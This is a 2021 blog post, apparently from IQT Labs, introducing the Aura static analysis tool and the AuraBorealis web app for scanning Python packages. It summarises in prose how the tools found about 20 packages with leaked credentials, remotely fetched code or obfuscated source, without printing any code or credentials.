AuraBorealis: How We Found 20 Vulnerable Python Packages

Aug. 24, 2021

John Speed Meyers IQT Labs, Engineer
Martin Carnogursky Sourcecode.ai, Creator of Aura
Mona Gogia IQT Labs, Senior Engineer
Kinga Dobolyi Formerly IQT Labs, Data Scientist
George P. Sieniawski IQT Labs, Senior Technologist
Mark Huson IQT, Network Operations Engineer
Taejas Ram IQT Labs, Data Scientist Intern

You rely on open source software. For instance, you might use the Mozilla Firefox browser or depend on OpenSSL, the cryptographic toolkit that has become a pillar of the modern web. Perhaps the web pages you visit regularly–or the ones your business depends on–are built with open source components like the web application framework Flask or the database technology MySQL.

Easily overlooked is that the security of the open source ecosystem, especially the package managers, is handled by, well, hardly anyone.

That’s right: the programmer equivalents of Apple’s app store, like the Python Package Index, have become critical to modern digital society and yet few people, let alone organizations, have the funding, incentives, and tools to secure them. (OpenSSF, a nascent industry collaboration to secure open source software, is a bright spot though! Similarly, Benjamin Balder Bach and Hanno Boeck have done admirable work hunting for vulnerabilities and bringing attention to Python typosquatting.)

Earlier this year, IQT Labs started an open source collaboration with Martin Čarnoguský of sourcecode.ai to build a tool we call AuraBorealis, a web application that makes searching for vulnerable, anomalous, and malicious Python packages easy and, dare we say it, fun. Based on Aura, a static analysis tool Martin is developing to scan source code, AuraBorealis can help anyone concerned with the safety of the entire Python Package Index or the integrity of a subset of Python packages. The GitHub repository can be found here. If you are interested in this app, particularly in discussing a beta test of this app, contact us at jmeyers@iqt.org. You can also create GitHub issues and send pull requests to Aura or AuraBorealis.

The remainder of this blog post explains:

the static analysis tool Aura, which powers AuraBorealis by scanning python packages for indicators of potential maliciousness,
AuraBorealis, the user-facing web app that organizes your search for vulnerable and malicious Python packages, and
the over 20 vulnerable, anomalous, or malicious Python packages found with Aura and AuraBorealis.

Aura: A Python Static Analysis Tool Designed for Large-Scale Package Scanning

Aura is a static analysis tool, which means it can search for indicators of suspicious, anomalous, or malicious code within a Python package without executing the code. Aura can scan hundreds of thousands of Python packages,

A common use of Aura involves looking for code that accidentally contains hardcoded passwords. Security teams using this feature could then notify the software developer responsible for that Python package and ask the developer to change any leaked passwords, thereby protecting themselves and other organizations that use that package. Aura can also scan a particular type of installation script (a “setup.py” script) for anomalies; longtime Python community leaders have acknowledged the dangers of this type of installation script and its susceptibility to abuse. Aura also checks for obfuscated code, performs taint analysis, and can be configured to search for custom patterns. The Aura documentation includes a full list of detections.

While the scan results for a single package can be consumed simply via a command line terminal, a scan of several hundred thousand Python packages can produce approximately 50 GB of audit data. We created AuraBorealis, described below, to help the security-conscious deal with this amount of records.

AuraBorealis: A Web App for Handling Large-Scale Python Security Data

AuraBorealis is the front-end web interface that an IT security team or software developer can use to assess the security of Python packages. Public and private sector organizations can use this tool to vet the Python packages underpinning their operations.

AuraBorealis is an app that presents the user with a series of pre-built tables designed to make it easier to search for potentially anomalous and malicious code. A screenshot of the main user interface is below.

Figure 1. Screenshot of AuraBorealis Homepage

AuraBorealis is a Flask-based Python web app that uses an Elastic database to store roughly ~800 million objects output from Aura’s comprehensive scan of the Python Package Index.

Email jmeyers@iqt.org if you are interested in further improvements to AuraBorealis, would like to discuss the project, or would be interested in beta-testing the app. Alternatively, consider submitting issues and pull requests on the AuraBorealis GitHub page.

How We Found Twenty Vulnerable or Malicious Python Packages

Aura’s audit data–whether summarized in AuraBorealis or accessed in another format of your choosing–contains a wealth of security-related information that your organization (or the administrators of the Python Package Index) can use to secure your Python supply chain.

In fact, recent analysis using Aura data identified 20 distinct packages with vulnerabilities. (See table 1.)

Vulnerability Type	Package Count
Leaked PyPi Credentials	11
Using Code Downloaded from Pastebin or Other External Site	6
Leaked Other Credentials	5
Obfuscated Source Code	2

Table 1. Count of Packages by Vulnerability Type. Some packages contain multiple vulnerabilities and so are double-counted.

Eleven packages were leaking Python Package Index credentials, meaning the software developers who created them left their username and password exposed. Malicious actors could abuse these credentials by adding malicious code or taking other harmful actions. Six packages downloaded code from external websites such as Pastebin. In other words, the software developers who published these packages built in the capability to–at any time–change the code that users of these packages execute. Yes, that’s dangerous for anyone using those packages and, unless you like the idea of strangers changing your code, should be avoided. Five packages leaked other credentials, such as an Amazon Web Services S3 username and password. Two packages had highly obfuscated code that is, at the least, very suspicious. And one package was confirmed to be malware and removed from the Python Package Index.

You Can’t Run, You Can’t Hide, But You Can Use Aura and AuraBorealis

You rely on open source software. Society’s dependence on open source software has become immense and irreversible. AuraBorealis offer one approach to understanding Python packages. We’ve used it to identify 20 vulnerable or malicious Python packages. If you or your organization depends on Python, we encourage you to use these tools and help us improve them. And if you are interested in piloting these tools or discussing this topic, please contact us at jmeyers@iqt.org.

Thank you to Bentz Tozer, Luke Berndt, Mike Chadwick, and Adam Van Etten for helpful review. Thank you also to George Lewis.

AuraBorealis: How We Found 20 Vulnerable Python Packages

Aura: A Python Static Analysis Tool Designed for Large-Scale Package Scanning

AuraBorealis: A Web App for Handling Large-Scale Python Security Data

How We Found Twenty Vulnerable or Malicious Python Packages

You Can’t Run, You Can’t Hide, But You Can Use Aura and AuraBorealis

Related Content

A Panoramic View of (One Small Slice) of Cybersecurity Data Science

Can Human Judgement Aid Knowledge Discovery Algorithms?

The Teachable Camera